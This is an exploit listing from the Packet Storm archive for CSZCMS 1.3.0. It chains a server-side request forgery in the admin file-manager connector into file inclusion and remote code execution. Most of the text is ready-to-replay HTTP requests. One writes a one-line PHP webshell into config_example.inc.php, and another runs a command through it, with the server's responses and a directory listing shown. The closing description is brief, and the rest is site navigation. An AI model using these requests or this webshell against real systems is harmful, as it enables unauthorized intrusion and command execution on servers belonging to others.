exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

CSZCMS 1.3.0 SSRF / LFI / Remote Code Execution

CSZCMS 1.3.0 SSRF / LFI / Remote Code Execution
Posted Apr 7, 2022
Authored by Hejap Zairy

CSZCMS version 1.3.0 server-side request forgery exploit that leverages local file inclusion to inject a remote shell.

tags | exploit, remote, shell, local, file inclusion
SHA-256 | 076778f725ea205cb5e59b34e6f765677401b4867ef7f2cfb8b18d6f76bd956a

CSZCMS 1.3.0 SSRF / LFI / Remote Code Execution

Change Mirror Download
# Title:  CSZCMS V1.3.0 - SSRF To LFI To Rce
# Author: Hejap Zairy
# Date: 07.04.2022
# Vendor: https://sourceforge.net/projects/cszcms/files/install/
# Software: https://liquidtelecom.dl.sourceforge.net/project/cszcms/install/CSZCMS-V1.3.0.zip
# Reference: https://github.com/Matrix07ksa
# Tested on: Windows, MySQL, Apache


# 1 - step inject ssrf
# 2 - inject SSRF to LFI
# 3 - Inject SSRF to LFI to RCE put webshell config

#vulnerability Code php
Needs more filtering commands


```
protected static $base64encodeSessionData = false;
protected $commands = array(
'abort' => array('id' => true),
'archive' => array('targets' => true, 'type' => true, 'mimes' => false, 'name' => false),
'callback' => array('node' => true, 'json' => false, 'bind' => false, 'done' => false),
'chmod' => array('targets' => true, 'mode' => true),
'dim' => array('target' => true, 'substitute' => false),
'duplicate' => array('targets' => true, 'suffix' => false),
'editor' => array('name' => true, 'method' => true, 'args' => false),
'extract' => array('target' => true, 'mimes' => false, 'makedir' => false),
'file' => array('target' => true, 'download' => false, 'cpath' => false, 'onetime' => false),
'get' => array('target' => true, 'conv' => false),
'info' => array('targets' => true, 'compare' => false),
'ls' => array('target' => true, 'mimes' => false, 'intersect' => false),
'mkdir' => array('target' => true, 'name' => false, 'dirs' => false),
'mkfile' => array('target' => true, 'name' => true, 'mimes' => false),
'netmount' => array('protocol' => true, 'host' => true, 'path' => false, 'port' => false, 'user' => false, 'pass' => false, 'alias' => false, 'options' => false),
'open' => array('target' => false, 'tree' => false, 'init' => false, 'mimes' => false, 'compare' => false),
'parents' => array('target' => true, 'until' => false),
'paste' => array('dst' => true, 'targets' => true, 'cut' => false, 'mimes' => false, 'renames' => false, 'hashes' => false, 'suffix' => false),
'put' => array('target' => true, 'content' => '', 'mimes' => false, 'encoding' => false),
'rename' => array('target' => true, 'name' => true, 'mimes' => false, 'targets' => false, 'q' => false),
'resize' => array('target' => true, 'width' => false, 'height' => false, 'mode' => false, 'x' => false, 'y' => false, 'degree' => false, 'quality' => false, 'bg' => false),
'rm' => array('targets' => true),
'search' => array('q' => true, 'mimes' => false, 'target' => false, 'type' => false),
'size' => array('targets' => true),
'subdirs' => array('targets' => true),
'tmb' => array('targets' => true),
'tree' => array('target' => true),
'upload' => array('target' => true, 'FILES' => true, 'mimes' => false, 'html' => false, 'upload' => false, 'name' => false, 'upload_path' => false, 'chunk' => false, 'cid' => false, 'node' => false, 'renames' => false, 'hashes' => false, 'suffix' => false, 'mtime' => false, 'overwrite' => false, 'contentSaveId' => false),
'url' => array('target' => true, 'options' => false),
'zipdl' => array('targets' => true, 'download' => false)
);
```

[+] Payload GET

#l1_MGRheS5waHA= base64 decode 0day.php
#l3_Y3N6ZGVmYXVsdC9tYWluLnBocA base64 decode main.php


```
GET /cms/index.php/admin/filemanager/connector/?cmd=get&targets=http://127.0.0.1/cms/index.php/admin/filemanager/connector/?cmd=file&target=l1_MGRheS5waHA= HTTP/1.1
Host: 127.0.0.1
sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: ar,en-US;q=0.9,en;q=0.8
Cookie: 9b9c96f47e485bdc8e5ec52af52e4f21_cszsess=h0nht0te0u73bbvu8e12lt2bmvfbepfn
Connection: close


```


#Status: CRITICAL

#Response
```
{"content":"data:image\/png;base64,PD89YCRfR0VUWzUxNV1gPz4NCg=="}
# <?=`$_GET[515]`?> decode base64

```




# Requests
```
POST /cms/admin/filemanager/connector/ HTTP/1.1
Host: 127.0.0.1
Content-Length: 128
sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="99"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
sec-ch-ua-platform: "Windows"
Origin: http://127.0.0.1
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1/cms/admin/filemanager
Accept-Encoding: gzip, deflate
Accept-Language: ar,en-US;q=0.9,en;q=0.8
Cookie: 9b9c96f47e485bdc8e5ec52af52e4f21_cszsess=pb61pkn5tmjqcl4h5ev9r69q8vbubqed
Connection: close

cmd=put&target=l6_Y29uZmlnX2V4YW1wbGUuaW5jLnBocA&encoding=UTF-8&content=%3C%3F%3D%60%24_GET%5B515%5D%60%3F%3E&reqid=18002b807a32
```







#Response

```
HTTP/1.1 200 OK
Date: Thu, 07 Apr 2022 06:31:19 GMT
Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
X-Powered-By: PHP/7.4.27
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=3600, must-revalidate
Pragma: no-cache
Set-Cookie: 9b9c96f47e485bdc8e5ec52af52e4f21_cszsess=pb61pkn5tmjqcl4h5ev9r69q8vbubqed; expires=Thu, 07-Apr-2022 18:31:19 GMT; Max-Age=43200; path=/; domain=127.0.0.1; HttpOnly
Set-Cookie: 9b9c96f47e485bdc8e5ec52af52e4f21_cszsess=pb61pkn5tmjqcl4h5ev9r69q8vbubqed; path=/; domain=127.0.0.1; HttpOnly
Set-Cookie: 9b9c96f47e485bdc8e5ec52af52e4f21_cszsess=pb61pkn5tmjqcl4h5ev9r69q8vbubqed; expires=Thu, 07-Apr-2022 18:31:19 GMT; Max-Age=43200; path=/; domain=127.0.0.1; HttpOnly
Set-Cookie: 9b9c96f47e485bdc8e5ec52af52e4f21_cszsess=pb61pkn5tmjqcl4h5ev9r69q8vbubqed; expires=Thu, 07-Apr-2022 18:31:19 GMT; Max-Age=43200; path=/; domain=127.0.0.1; HttpOnly
Set-Cookie: 9b9c96f47e485bdc8e5ec52af52e4f21_cszsess=pb61pkn5tmjqcl4h5ev9r69q8vbubqed; expires=Thu, 07-Apr-2022 18:31:19 GMT; Max-Age=43200; path=/; domain=127.0.0.1; HttpOnly
Set-Cookie: 9b9c96f47e485bdc8e5ec52af52e4f21_cszsess=pb61pkn5tmjqcl4h5ev9r69q8vbubqed; expires=Thu, 07-Apr-2022 18:31:19 GMT; Max-Age=43200; path=/; domain=127.0.0.1; HttpOnly
Set-Cookie: 9b9c96f47e485bdc8e5ec52af52e4f21_cszsess=pb61pkn5tmjqcl4h5ev9r69q8vbubqed; expires=Thu, 07-Apr-2022 18:31:19 GMT; Max-Age=43200; path=/; domain=127.0.0.1; HttpOnly
Set-Cookie: 9b9c96f47e485bdc8e5ec52af52e4f21_cszsess=pb61pkn5tmjqcl4h5ev9r69q8vbubqed; expires=Thu, 07-Apr-2022 18:31:19 GMT; Max-Age=43200; path=/; domain=127.0.0.1; HttpOnly
Set-Cookie: 9b9c96f47e485bdc8e5ec52af52e4f21_cszsess=pb61pkn5tmjqcl4h5ev9r69q8vbubqed; expires=Thu, 07-Apr-2022 18:31:19 GMT; Max-Age=43200; path=/; domain=127.0.0.1; HttpOnly
Content-Length: 190
Connection: keep-alive, close
Content-Type: application/json; charset=utf-8

{"changed":[{"isowner":false,"ts":1649313079,"mime":"text\/x-php","read":1,"write":1,"size":"17","hash":"l6_Y29uZmlnX2V4YW1wbGUuaW5jLnBocA","name":"config_example.inc.php","phash":"l6_Lw"}]}
```






#webshell

```
GET /cms/config_example.inc.php?515=dir HTTP/1.1
Host: 127.0.0.1
Cache-Control: max-age=0
sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: ar,en-US;q=0.9,en;q=0.8
Cookie: 9b9c96f47e485bdc8e5ec52af52e4f21_cszsess=pb61pkn5tmjqcl4h5ev9r69q8vbubqed
Connection: close


```



#response

```
HTTP/1.1 200 OK
Date: Thu, 07 Apr 2022 06:37:33 GMT
Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
X-Powered-By: PHP/7.4.27
Connection: keep-alive, close
Cache-Control: max-age=3600, must-revalidate
Content-Length: 1917
Content-Type: text/html; charset=UTF-8

Volume in drive C is OS
Volume Serial Number is 2EF1-9DCA

Directory of C:\xampp\htdocs\cms

04/07/2022 09:13 AM <DIR> .
04/07/2022 02:23 AM <DIR> ..
04/30/2019 05:29 PM 8,444 .htaccess
04/07/2022 09:13 AM <DIR> .quarantine
04/07/2022 09:13 AM <DIR> .tmb
04/07/2022 07:07 AM 8 127.0.0.1_csv_banner_mgt_20220407.csv
04/07/2022 07:14 AM 5,362 127.0.0.1_files_20220407.zip
04/07/2022 07:14 AM 54,888 127.0.0.1_photo_20220407.zip
04/07/2022 06:57 AM <DIR> assets
04/09/2018 03:34 PM 479 cache.config.inc.php
11/29/2021 07:40 AM 4,733 CHANGELOG
04/07/2022 06:55 AM 696 config.inc.php
04/07/2022 09:37 AM 17 config_example.inc.php
08/07/2018 05:18 AM 4,075 CONTRIBUTING.md
04/21/2021 07:01 AM 151,259 corecss.css
04/21/2021 07:01 AM 378,086 corejs.js
04/07/2022 06:57 AM <DIR> cszcms
06/28/2019 09:04 PM 166 devtoolsbar.config.inc.php
04/07/2022 06:55 AM 690 env.config.inc.php
04/07/2022 06:55 AM 269 htaccess.config.inc.php
06/28/2019 02:48 PM 11,526 index.php
04/07/2022 06:57 AM <DIR> install
01/28/2020 06:40 AM 3,439 LICENSE.md
04/09/2018 03:35 PM 336 memcached.config.inc.php
04/09/2018 03:34 PM 1,297 nginx_example.com.conf
04/07/2022 09:13 AM <DIR> photo
04/09/2021 09:52 AM 1,744 proxy.inc.php
11/11/2021 07:48 AM 1,868 README.md
04/09/2018 03:35 PM 496 redis.config.inc.php
11/11/2021 07:46 AM 520 SECURITY.md
04/07/2022 06:57 AM <DIR> system
04/07/2022 09:13 AM <DIR> templates
22 File(s) 630,398 bytes
10 Dir(s) 80,676,995,072 bytes free

```

# Description:
the attacker might cause the server to make a connection to internal-only services within the organization's infrastructure. In other cases, they may be able to force the server to connect to arbitrary external systems, potentially leaking sensitive data such as authorization credentials
to Local File Inclusion is an attack technique in which attackers trick a web application into either running or exposing files on a web server or execution file If converted rce


# Proof and Exploit:
https://i.imgur.com/pzWjkXI.png
https://i.imgur.com/xxjxnGk.png
https://i.imgur.com/S1F7MaJ.png
https://i.imgur.com/BwWTfYU.png























Login or Register to add favorites

File Archive:

October 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    39 Files
  • 2
    Oct 2nd
    23 Files
  • 3
    Oct 3rd
    18 Files
  • 4
    Oct 4th
    0 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    0 Files
  • 8
    Oct 8th
    0 Files
  • 9
    Oct 9th
    0 Files
  • 10
    Oct 10th
    0 Files
  • 11
    Oct 11th
    0 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close